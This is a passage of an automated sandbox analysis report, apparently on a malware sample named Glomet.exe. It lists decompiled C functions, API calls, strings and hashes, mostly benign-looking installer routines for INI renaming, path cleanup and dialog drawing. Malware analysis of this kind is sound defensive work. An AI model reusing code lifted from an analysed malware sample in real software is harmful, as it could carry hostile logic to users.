                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                              • String ID: ARBEJDSTILLADELSER Setup$F
                                                                                                                                                                              • API String ID: 941294808-1239134799
                                                                                                                                                                              • Opcode ID: 2271267dbcbb5a429a5c45712c2942ab76dd5bcbd32f73574c3dae7e133f94db
                                                                                                                                                                              • Instruction ID: 1fbfacec2506b2ab202253b0e42594ede9e170c8a1cf430301d1f688d6e441df
                                                                                                                                                                              • Opcode Fuzzy Hash: 2271267dbcbb5a429a5c45712c2942ab76dd5bcbd32f73574c3dae7e133f94db
                                                                                                                                                                              • Instruction Fuzzy Hash: AA417D71800209AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74E955DFA4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00405EC0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405EC0(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c620 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca20, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c220, "%s=%s\r\n", 0x42c620, 0x42ca20);
						_t53 = _t52 + 0x10;
						E004062EA(_t37, 0x400, 0x42ca20, 0x42ca20,  *((intOrPtr*)( *0x42f430 + 0x128)));
						_t12 = E00405DEA(0x42ca20, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E62(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D4F(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D4F(_t38, _t21 + 0xa, 0x40a3d8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405DA5(_t24 + _t46, 0x42c220, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E91(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DEA(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c620, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                                                                                                              0x00405ec0
                                                                                                                                                                              0x00405ec9
                                                                                                                                                                              0x00405ed0
                                                                                                                                                                              0x00405ee4
                                                                                                                                                                              0x00405f0c
                                                                                                                                                                              0x00405f17
                                                                                                                                                                              0x00405f1b
                                                                                                                                                                              0x00405f3b
                                                                                                                                                                              0x00405f42
                                                                                                                                                                              0x00405f4c
                                                                                                                                                                              0x00405f59
                                                                                                                                                                              0x00405f5e
                                                                                                                                                                              0x00405f63
                                                                                                                                                                              0x00405f67
                                                                                                                                                                              0x00405f76
                                                                                                                                                                              0x00405f78
                                                                                                                                                                              0x00405f85
                                                                                                                                                                              0x00405f89
                                                                                                                                                                              0x00406024
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405f9f
                                                                                                                                                                              0x00405fac
                                                                                                                                                                              0x00405fd0
                                                                                                                                                                              0x00405fd4
                                                                                                                                                                              0x00405ff3
                                                                                                                                                                              0x00405ff7
                                                                                                                                                                              0x00405ff7
                                                                                                                                                                              0x00405ff9
                                                                                                                                                                              0x00406002
                                                                                                                                                                              0x0040600d
                                                                                                                                                                              0x00406018
                                                                                                                                                                              0x0040601e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040601e
                                                                                                                                                                              0x00405fd6
                                                                                                                                                                              0x00405fd9
                                                                                                                                                                              0x00405fe4
                                                                                                                                                                              0x00405fe0
                                                                                                                                                                              0x00405fe2
                                                                                                                                                                              0x00405fe3
                                                                                                                                                                              0x00405fe3
                                                                                                                                                                              0x00405feb
                                                                                                                                                                              0x00405fed
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405fed
                                                                                                                                                                              0x00405fb7
                                                                                                                                                                              0x00405fbd
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405fbd
                                                                                                                                                                              0x00405f89
                                                                                                                                                                              0x00405f67
                                                                                                                                                                              0x00405ee6
                                                                                                                                                                              0x00405ef1
                                                                                                                                                                              0x00405efa
                                                                                                                                                                              0x00405efe
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405efe
                                                                                                                                                                              0x0040602f

                                                                                                                                                                              APIs
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406051,?,?), ref: 00405EF1
                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 00405EFA
                                                                                                                                                                                • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                                                                                                                                                • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 00405F17
                                                                                                                                                                              • wsprintfA.USER32 ref: 00405F35
                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405F70
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7F
                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB7
                                                                                                                                                                              • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 0040600D
                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 0040601E
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406025
                                                                                                                                                                                • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F4C,C:\programdata\Glomet.exe,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                                                                                                                                                • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405E10
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                              • String ID: %s=%s$[Rename]
                                                                                                                                                                              • API String ID: 2171350718-1727408572
                                                                                                                                                                              • Opcode ID: d7fe0695add532f02f25bf8ecd9f04fee568a4ba3192caa9430eb4a67ab86fce
                                                                                                                                                                              • Instruction ID: 8908439cc2d3cfcd996604707d180e10d826c6d0da91f503aeabb4e5616cbf2a
                                                                                                                                                                              • Opcode Fuzzy Hash: d7fe0695add532f02f25bf8ecd9f04fee568a4ba3192caa9430eb4a67ab86fce
                                                                                                                                                                              • Instruction Fuzzy Hash: 1531E731640B16ABC2207B65AD48F5B3A9CDF45758F14043BFA42F62D2DB7CD8118AAD
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00406535 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00406535(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C56(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405C14("*?|<>/\":", _t5))) == 0) {
							E00405DA5(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                                                                              0x00406537
                                                                                                                                                                              0x0040653f
                                                                                                                                                                              0x00406553
                                                                                                                                                                              0x00406553
                                                                                                                                                                              0x00406559
                                                                                                                                                                              0x00406566
                                                                                                                                                                              0x00406566
                                                                                                                                                                              0x00406567
                                                                                                                                                                              0x00406569
                                                                                                                                                                              0x0040656d
                                                                                                                                                                              0x0040656f
                                                                                                                                                                              0x00406578
                                                                                                                                                                              0x0040657a
                                                                                                                                                                              0x00406594
                                                                                                                                                                              0x0040659c
                                                                                                                                                                              0x0040659c
                                                                                                                                                                              0x004065a1
                                                                                                                                                                              0x004065a3
                                                                                                                                                                              0x004065a5
                                                                                                                                                                              0x004065a9
                                                                                                                                                                              0x004065aa
                                                                                                                                                                              0x004065ad
                                                                                                                                                                              0x004065b5
                                                                                                                                                                              0x004065b7
                                                                                                                                                                              0x004065bb
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004065c1
                                                                                                                                                                              0x004065c6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004065c6
                                                                                                                                                                              0x004065cb

                                                                                                                                                                              APIs
                                                                                                                                                                              • CharNextA.USER32(0000000B,*?|<>/":,00000000,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ,0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040658D
                                                                                                                                                                              • CharNextA.USER32(0000000B,0000000B,0000000B,00000000,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ,0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040659A
                                                                                                                                                                              • CharNextA.USER32(0000000B,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ,0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040659F
                                                                                                                                                                              • CharPrevA.USER32(0000000B,0000000B,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ,0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 004065AF
                                                                                                                                                                              Strings
                                                                                                                                                                              • "C:\programdata\Glomet.exe" , xrefs: 00406535
                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00406536
                                                                                                                                                                              • *?|<>/":, xrefs: 0040657D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                              • String ID: "C:\programdata\Glomet.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                              • API String ID: 589700163-2133002319
                                                                                                                                                                              • Opcode ID: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
                                                                                                                                                                              • Instruction ID: f1a46c244338e9c327de57877a99ef2f1f2ce6c7380876dc27bda46ebf0462ee
                                                                                                                                                                              • Opcode Fuzzy Hash: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
                                                                                                                                                                              • Instruction Fuzzy Hash: 671134918047903DFB3216386C04B776FC94F9B760F5A007BE4C2722CAC63C5CA6826D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 0040433B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E0040433B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                                                                                                              0x0040434d
                                                                                                                                                                              0x00404403
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404403
                                                                                                                                                                              0x0040435e
                                                                                                                                                                              0x00404362
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040437c
                                                                                                                                                                              0x0040437c
                                                                                                                                                                              0x00404385
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404387
                                                                                                                                                                              0x00404393
                                                                                                                                                                              0x00404396
                                                                                                                                                                              0x00404396
                                                                                                                                                                              0x0040439c
                                                                                                                                                                              0x004043a2
                                                                                                                                                                              0x004043a2
                                                                                                                                                                              0x004043ae
                                                                                                                                                                              0x004043b4
                                                                                                                                                                              0x004043bb
                                                                                                                                                                              0x004043be
                                                                                                                                                                              0x004043c1
                                                                                                                                                                              0x004043c3
                                                                                                                                                                              0x004043c3
                                                                                                                                                                              0x004043cb
                                                                                                                                                                              0x004043d1
                                                                                                                                                                              0x004043d1
                                                                                                                                                                              0x004043db
                                                                                                                                                                              0x004043e0
                                                                                                                                                                              0x004043e3
                                                                                                                                                                              0x004043e8
                                                                                                                                                                              0x004043eb
                                                                                                                                                                              0x004043eb
                                                                                                                                                                              0x004043fb
                                                                                                                                                                              0x004043fb
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004043fe

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                              • Opcode ID: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
                                                                                                                                                                              • Instruction ID: d64fbe2596ca860a271eaf52242e9b3e10407c8dba4713a28e38d7cfcaef20bb
                                                                                                                                                                              • Opcode Fuzzy Hash: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
                                                                                                                                                                              • Instruction Fuzzy Hash: 822174716007049FCB30DF68D908B5BBBF8AF81710B04892EED96A26E1C734D915CB54
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00404C27 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00404C27(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                                                                              0x00404c35
                                                                                                                                                                              0x00404c42
                                                                                                                                                                              0x00404c48
                                                                                                                                                                              0x00404c86
                                                                                                                                                                              0x00404c86
                                                                                                                                                                              0x00404c95
                                                                                                                                                                              0x00404c9c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404c9e
                                                                                                                                                                              0x00404c4a
                                                                                                                                                                              0x00404c59
                                                                                                                                                                              0x00404c61
                                                                                                                                                                              0x00404c64
                                                                                                                                                                              0x00404c76
                                                                                                                                                                              0x00404c7c
                                                                                                                                                                              0x00404c83
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404c83
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C42
                                                                                                                                                                              • GetMessagePos.USER32 ref: 00404C4A
                                                                                                                                                                              • ScreenToClient.USER32 ref: 00404C64
                                                                                                                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C76
                                                                                                                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C9C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                              • String ID: f
                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                              • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                                                                              • Instruction ID: 6a0354fd0873e2a66e4e803e7b6bfaf8a717de4a4c12bc6328b4bc3a065c57a7
                                                                                                                                                                              • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                                                                              • Instruction Fuzzy Hash: DB015E71900219BAEB00DBA4DD85BFFBBBCAF55B25F10012BBB40B61D0C7B499018BA4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00401E35 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                                              			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C17(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b838->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b848 = E00402C17(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b84f = 1;
				 *0x40b84c = _t15 & 0x00000001;
				 *0x40b84d = _t15 & 0x00000002;
				 *0x40b84e = _t15 & 0x00000004;
				E004062EA(_t9, _t31, _t33, "Calibri",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b838);
				_push(_t18);
				_push(_t33);
				E004061B5();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                                                                                                              0x00401e35
                                                                                                                                                                              0x00401e40
                                                                                                                                                                              0x00401e42
                                                                                                                                                                              0x00401e4f
                                                                                                                                                                              0x00401e66
                                                                                                                                                                              0x00401e6b
                                                                                                                                                                              0x00401e78
                                                                                                                                                                              0x00401e7d
                                                                                                                                                                              0x00401e81
                                                                                                                                                                              0x00401e8c
                                                                                                                                                                              0x00401e93
                                                                                                                                                                              0x00401ea5
                                                                                                                                                                              0x00401eab
                                                                                                                                                                              0x00401eb0
                                                                                                                                                                              0x00401eba
                                                                                                                                                                              0x00402628
                                                                                                                                                                              0x00401569
                                                                                                                                                                              0x00402a42
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(?), ref: 00401E38
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                                                                                                                              • ReleaseDC.USER32 ref: 00401E6B
                                                                                                                                                                              • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
